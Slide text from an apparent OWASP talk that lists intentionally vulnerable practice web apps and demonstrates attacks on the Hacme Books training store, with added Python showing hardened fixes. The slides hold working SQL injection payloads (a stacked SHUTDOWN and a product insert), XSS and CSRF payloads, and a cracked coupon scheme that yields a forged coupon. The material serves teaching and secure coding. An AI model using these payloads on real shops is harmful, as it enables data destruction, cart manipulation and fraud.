Practical Examples of Hacking an eCommerce Site. Mateo Martínez, QSA, CISSP. OWASP URUGUAY
OWASP Vulnerable Web Applications Directory Project
Get out of Jail!
Sections: Offline, Virtual Machines (VMs) or ISO images, Online/Live
Offline: The following list references downloadable vulnerable web applications to play with that can be installed on a standard operating system (Linux, Windows, Mac OS X, etc) using a standard web platform (Apache/PHP, Tomcat/Java, IIS/.NET, etc).
The BodgeIt Store (Java): http://code.google.com/p/bodgeit/ (download)
OWASP Bricks (PHP): http://sechow.com/bricks/index.html (download & docs)
The ButterFly Security Project (PHP): http://sourceforge.net/projects/thebutterflytmp/ (download)
bWAPP - an extremely buggy web application! (PHP): http://www.itsecgames.com (download) (docs)
Damn Vulnerable Web Application - DVWA (PHP): http://www.dvwa.co.uk (download)
Damn Vulnerable Web Services - DVWS (PHP): http://dvws.secureideas.net (download)
OWASP Hackademic Challenges Project (PHP): https://www.owasp.org/index.php/OWASP_Hackademic_Challenges_Project (download)
Google Gruyere (Python): http://google-gruyere.appspot.com (download)
Hacme Bank (.NET): http://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx (download)
Hacme Books (Java): http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx (download)
Hacme Casino (Ruby on Rails): http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx (download)
Hacme Shipping (ColdFusion): http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx (download)
Hacme Travel (C++): http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx (download)
OWASP Insecure Web App Project (Java): https://www.owasp.org/index.php/Category:OWASP_Insecure_Web_App_Project (download - orphaned)
Mutillidae (PHP): http://www.irongeek.com/i.php?page=mutillidae/mutillidae-deliberately-vulnerable-php-owasp-top-10 (download)
OWASP .NET Goat (C#): https://owasp.codeplex.com (download)
Peruggia (PHP): http://peruggia.sourceforge.net (download)
Puzzlemall (Java): https://code.google.com/p/puzzlemall/ (download) (docs)
Stanford Securibench (Java) & Micro: http://suif.stanford.edu/~livshits/securibench/ (download)
SQLI-labs (PHP): https://github.com/Audi-1/sqli-labs (download) (blog)
SQLol (PHP): https://github.com/SpiderLabs/SQLol (download)
OWASP Vicnum Project (Perl & PHP): https://www.owasp.org/index.php/Category:OWASP_Vicnum_Project (download)
VulnApp (.NET): http://www.nth-dimension.org.uk/blog.php?id=88 (CVS download & vulns)
WackoPicko (PHP): https://github.com/adamdoupe/WackoPicko (download) (whitepaper)
OWASP WebGoat (Java): https://www.owasp.org/index.php/Category:OWASP_WebGoat_Project (download) (guide)
OWASP ZAP WAVE - Web Application Vulnerability Examples (Java): http://code.google.com/p/zaproxy/downloads/list
Wavsep - Web Application Vulnerability Scanner Evaluation Project (Java): https://code.google.com/p/wavsep/ (download) (docs)
WIVET - Web Input Vector Extractor Teaser: https://code.google.com/p/wivet/ (download) (tests)
Virtual Machines (VMs) or ISO images: The following list references preinstalled and ready to use virtual machines (VMs) or ISO images that contain one or multiple vulnerable web applications to play with.
BadStore (ISO): http://www.badstore.net (download - registration required)
Bee-Box (bWAPP VMware): http://sourceforge.net/projects/bwapp/files/bee-box/
OWASP BWA - Broken Web Applications Project (VMware - list): https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project (download)
Drunk Admin Web Hacking Challenge (VMware): https://bechtsoudis.com/work-stuff/challenges/drunk-admin-web-hacking-challenge/ (download)
Exploit.co.il Vuln Web App (VMware): http://exploit.co.il/projects/vuln-web-app/ (download)
GameOver (VMware): http://sourceforge.net/projects/null-gameover/ (download)
Hackxor (VMware): http://hackxor.sourceforge.net/cgi-bin/index.pl (download) (hints&tips)
Hacme Bank Prebuilt VM (VMware): http://ninja-sec.com/index.php/hacme-bank-prebuilt-vmware-image-ninja-sec-com/ (download)
Kioptrix4 (VMware & Hyper-V): http://www.kioptrix.com/blog/?p=604 (download)
LAMPSecurity (VMware): http://sourceforge.net/projects/lampsecurity/ (download) (doc)
Metasploitable (VMware): http://blog.metasploit.com/2010/05/introducing-metasploitable.html (download - torrent) (doc)
Metasploitable 2 (VMware): https://community.rapid7.com/docs/DOC-1875 (download)
Moth (VMware): http://www.bonsai-sec.com/en/research/moth.php (download)
PentesterLab - The Exercises (ISO & PDF): https://www.pentesterlab.com/exercises/
PHDays I-Bank (VMware): http://phdays.blogspot.com.es/2012/05/once-again-about-remote-banking.html (download)
Samurai WTF (ISO - list): http://www.samurai-wtf.org (download)
Sauron (QEMU) [Spanish]: http://sg6-labs.blogspot.com/2007/12/secgame-1-sauron.html (solutions)
UltimateLAMP (VMware - list): http://ronaldbradford.com/blog/ultimatelamp-2006-05-19/ (download)
Virtual Hacking Lab (ZIP): http://sourceforge.net/projects/virtualhacking/ (download)
Web Security Dojo (VMware, VirtualBox - list): http://www.mavensecurity.com/web_security_dojo/ (download)
Online/Live: The following list references online and live vulnerable web applications available on the Internet to play with.
Acunetix: http://testasp.vulnweb.com (Forum - ASP), http://testaspnet.vulnweb.com (Blog - .NET), http://testphp.vulnweb.com (Art shopping - PHP)
Cenzic CrackMeBank: http://crackme.cenzic.com
Google Gruyere (Python): http://google-gruyere.appspot.com/start
Hacking-Lab (eg. OWASP Top 10): https://www.hacking-lab.com/events/registerform.html?eventid=245
Hack.me (beta): https://hack.me
HackThisSite (HTS - Basic & Realistic (web) Missions): http://www.hackthissite.org
Hackxor online demo: http://hackxor.sourceforge.net/cgi-bin/index.pl#demo (algo/smurf)
HP/SpiDynamics Free Bank Online: http://zero.webappsecurity.com (admin/admin)
IBM/Watchfire AltoroMutual: http://demo.testfire.net (jsmith/Demo1234)
NTOSpider Web Scanner Test Site: http://www.webscantest.com (testuser/testpass)
OWASP Hackademic Challenges Project - Live (PHP - Joomla): http://hackademic1.teilar.gr
Pentester Academy: http://pentesteracademylab.appspot.com
Full directory: http://goo.gl/84NfEv
HackPack v1.0: Hacme Bank - Android v1.0, Hacme Bank v2.0, Hacme Books, Hacme Casino v1.0, Hacme Shipping, Hacme Travel
Hacme Bank™ Android is designed to teach mobile application developers, programmers, architects and security professionals how to create secure software and evaluate their own software to identify vulnerabilities.
Hacme Bank™ is designed to teach application developers, programmers, architects and security professionals how to create secure software.
Foundstone Hacme Books is a learning platform for secure software development.
Foundstone Hacme Casino™ is a learning platform for secure software development.
Hacme Shipping is a web-based shipping application developed to demonstrate common web application hacking techniques.
Hacme Travel is designed to teach how to create secure software.
#1 Error Generation
Characters entered as input: “ ’ ”
Result: stack trace
What the stack trace discloses:
• Database type – Hypersonic SQL (org.hsqldb)
• Application server – Apache Tomcat
• Uses the Spring framework
• J2EE application – Java namespaces
#2 SQL Injection (a)
Command that halts the database server in HSQLDB: SHUTDOWN
select * from products where title like '%texto_del_usuario%' and like '%otro_texto_del_usuario%'
select * from products where title like '%'; SHUTDOWN; --%' and like '%otro_texto_del_usuario%'
#2 SQL Injection (b)
my feedback', 735); insert into products (title, description, popularity, price, vendor, category, publisher, isbn, author, imgurl, quantity) values ('Eat my shorts you pointy haired boss','A great book',4,29.95,'Amazon','Technical','Addison Wesley','1234567890123','Disgruntled Employee','http://',1); --
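As an added example (not code from the talk or from Hacme Books), here is the product search from the slides written two ways against an in-memory SQLite database that stands in for HSQLDB: the vulnerable form splices the user text into the LIKE pattern, the hardened form binds the whole pattern and escapes LIKE wildcards. The table, its sample rows and the function names are constructed for the example.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample catalogue standing in for the Hacme Books products table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table products (title text, description text, price real)")
    con.executemany("insert into products values (?, ?, ?)", [
        ("Secure Coding", "A great book", 29.95),
        ("100% Java", "Tips and tricks", 19.95),
        ("Crypto for Shops", "Coupons done right", 39.95),
    ])
    return con

def search_vulnerable(con: sqlite3.Connection, text: str) -> list:
    # Same shape as the slide's query: the user text is spliced into the SQL string,
    # so a quote ends the literal and % or _ act as LIKE wildcards.
    sql = f"select title from products where title like '%{text}%'"
    return [row[0] for row in con.execute(sql)]

def escape_like(text: str) -> str:
    # Escape the escape character first, then the two LIKE metacharacters.
    return text.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")

def search_safe(con: sqlite3.Connection, text: str) -> list:
    # The whole pattern is a bound parameter: the driver never re-parses it as SQL,
    # and the ESCAPE clause makes a user-typed % or _ match literally.
    pattern = "%" + escape_like(text) + "%"
    sql = "select title from products where title like ? escape '\\'"
    return [row[0] for row in con.execute(sql, (pattern,))]

def statement_altered(con: sqlite3.Connection, text: str) -> bool:
    """True when the input changed the statement structure. Python's sqlite3
    driver refuses the second statement that '; SHUTDOWN; --' introduces; a
    server that accepts stacked statements, like HSQLDB, would run it."""
    try:
        search_vulnerable(con, text)
        return False
    except (sqlite3.Error, sqlite3.Warning):
        return True
```

With the bound version the injected text is simply a search term that matches nothing, and the connection keeps working afterwards.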
#3 XSS (Cross-Site Scripting)
<script>alert("XSS")</script>
You should buy our latest bestseller instead of this book. <script> location="http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470" </script>
#4 CSRF (Cross-Site Request Forgery)
You should really consider purchasing the latest bestseller. <img src=http://localhost:8989/HacmeBooks/addShoppingCart.html?productId=1470 height="1"/>
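An added example (not code from the talk or from Hacme Books) covering both the XSS slide and the CSRF slide: the stored review is output-encoded so the script in it is displayed rather than run, and a model of the addShoppingCart.html endpoint refuses GET requests (which is all an img tag or a location change can send) and requires a per-session token on POST. The handler signature, the session dict and the token scheme are assumptions for illustration.

```python
import hmac
import html
import secrets

# Constructed review text: the payload from the XSS slide, stored as a plain string.
STORED_REVIEW = ('You should buy our latest bestseller instead of this book. '
                 '<script> location="http://localhost:8989/HacmeBooks/'
                 'addShoppingCart.html?productId=1470" </script>')

def render_review(text: str) -> str:
    """Output encoding for an HTML body context: the review is shown, not executed."""
    return '<p class="review">' + html.escape(text, quote=True) + '</p>'

def issue_csrf_token(session: dict) -> str:
    """Random per-session token; the server keeps it and places it only in its own form."""
    session["csrf"] = secrets.token_urlsafe(32)
    return session["csrf"]

def add_shopping_cart(session: dict, method: str, params: dict) -> tuple:
    """Model of addShoppingCart.html hardened against the <img> and location tricks:
    a GET never changes state, and a POST must carry the session's token, which a
    page on another origin cannot read."""
    if method != "POST":
        return 405, "use POST"
    expected = session.get("csrf", "")
    supplied = params.get("csrf", "")
    if not expected or not hmac.compare_digest(supplied, expected):
        return 403, "missing or invalid CSRF token"
    session.setdefault("cart", []).append(params["productId"])
    return 200, "added product " + params["productId"]
```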
#5 Crypto
15% discount: AEODBOBOOF
25% discount: BEAAABBOOF BEOABDBOOF
AEODBOBOOF BEAAABBOOF BEOABDBOOF
2511122006 2501242006 BEAAAB2006 BEOABD2006
%   Month  Day  Year
15  04     20   2006
25  11     12   2006
95  04     20   2014
IE  OD     BO   BOAD
Try this coupon: IEODBOBOAD
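An added example (not code from the talk or from Hacme Books) that decodes the slides' coupons under the substitution the table reveals (A..I stand for 1..9, O for 0; fields: discount %, month, day, year) and then shows the fix: the same readable body carries an HMAC tag that the server verifies, so a code anyone can mint is refused. The server key, the dash-separated format and the function names are assumptions.

```python
import hashlib
import hmac

# Substitution read off the slides: A..I stand for 1..9 and O stands for 0.
LETTERS = {"O": 0, **{chr(ord("A") + i): i + 1 for i in range(9)}}
DIGITS = {value: letter for letter, value in LETTERS.items()}

def decode_coupon(code: str) -> dict:
    """AEODBOBOOF -> 15 04 20 2006: discount %, month, day, year."""
    if len(code) != 10 or any(ch not in LETTERS for ch in code):
        raise ValueError("not a coupon code")
    digits = "".join(str(LETTERS[ch]) for ch in code)
    return {"discount": int(digits[0:2]), "month": int(digits[2:4]),
            "day": int(digits[4:6]), "year": int(digits[6:10])}

def encode_coupon(discount: int, month: int, day: int, year: int) -> str:
    """The inverse mapping: the scheme is pure encoding, with nothing secret in it."""
    digits = f"{discount:02d}{month:02d}{day:02d}{year:04d}"
    return "".join(DIGITS[int(ch)] for ch in digits)

SERVER_KEY = b"constructed-demo-key-not-for-real-use"  # assumption: server-side secret

def issue_signed_coupon(discount, month, day, year, key=SERVER_KEY) -> str:
    """Hardened form: the readable body plus a truncated HMAC-SHA256 tag over it."""
    body = encode_coupon(discount, month, day, year)
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()[:16]
    return f"{body}-{tag}"

def redeem(coupon: str, key=SERVER_KEY):
    """Decoded fields only when the tag verifies; None for unsigned or altered codes."""
    body, _, tag = coupon.partition("-")
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()[:16]
    if not tag or not hmac.compare_digest(tag, expected):
        return None
    return decode_coupon(body)
```

The tag does not hide the discount or the date; it only makes the server the sole party able to issue a code that redeems, and any change to the body or tag is rejected.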
#6 Broken Access Control
Hacme Books http://sourceforge.net/projects/foundstone
Thank you very much! mateo.martinez@owasp.org